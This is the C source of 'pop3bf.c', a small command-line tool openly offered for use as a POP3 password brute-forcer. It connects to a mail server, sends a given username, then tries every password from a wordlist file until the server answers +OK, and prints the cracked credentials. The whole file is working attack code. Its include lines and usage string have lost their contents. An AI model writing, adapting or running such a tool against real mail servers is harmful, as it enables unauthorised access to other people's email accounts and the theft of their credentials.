/***********************************************/
/*
/* pop3bf.c - Simple POP3 brute force tool
/*
/* by aton
/*
/* copyleft:
/* copy it, use it, modify it, i dont care
/*
/***********************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include //for non-blocking
#include //for timeval()
#include
#define LEN 255 // max number of bytes we can get at once
int main(int argc, char *argv[])
{
int sd, num, i=0, port=0, n=0;
char buf[LEN+1]="\0";
char user[256], curpass[256], cmd[512];
struct sockaddr_in servaddr; // connector's address information
struct hostent *he;
FILE *fd;
if (argc != 5)
{
printf("pop3 brute force - by aton\n");
printf("usage: %s \n", argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL) // get the host info
{
perror("gethostbyname");
exit(1);
}
if ((port=atoi(argv[2])) == 0 ) port=110;
fd=fopen(argv[4], "r");
if (fd==NULL)
{
printf("error: couldnt open file: %s\n", argv[4]);
}
if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) // open a socket
{
perror("socket");
exit(1);
}
servaddr.sin_family = AF_INET;
// host byte order
servaddr.sin_port = htons(port); // short, network byte order
servaddr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(servaddr.sin_zero), '\0', 8); // zero the rest of the struct
fprintf(stdout, "\n===== pop3 brute force by aton =====\n\n");
if (connect(sd, (struct sockaddr *)&servaddr,sizeof(servaddr)) < 0) // connect
{
if (errno!=EINPROGRESS)
exit(1);
}
printf("connected to %s:%s.\n\n", argv[1], argv[2]);
printf("wainting for server welcome message...\n");
num=recv(sd, buf, LEN, 0); //read from socket
buf[num]=0;
printf("%s\n", buf);
strcpy(user, argv[3]);
strcpy(cmd, "user ");
strcat(cmd, user);
printf("-> %s\n", cmd);
if (send(sd, cmd, strlen(cmd)+1,0) == -1) // send username
perror("send");
num=recv(sd, buf, LEN, 0); //read from socket
buf[num]='\0';
printf("%s\n",buf);
printf("authenticating :)\n");
printf(".\n");
do
{
fgets(curpass, sizeof(curpass), fd);
if (feof(fd)!=0)
{
printf("end of file reached for %s\n", argv[4]);
break;
}
i++; if (i>10000) i=0;
strcpy(cmd, "pass ");
strcat(cmd, curpass);
printf("%s\n", curpass);
if (send(sd, cmd, strlen(cmd)+1, 0) == -1) //send password
perror("send");
num=recv(sd, buf, LEN, 0); //read from socket
buf[num]=0; buf[3]=0;
if (strcmp(buf, "+OK")==0)
{
printf("user: \"%s\" password: \"%s\"\n\n", user, curpass);
break;
}
else if ((i%100)==0) printf(".\n");
} while (1);
close(sd);
return 0;
}
|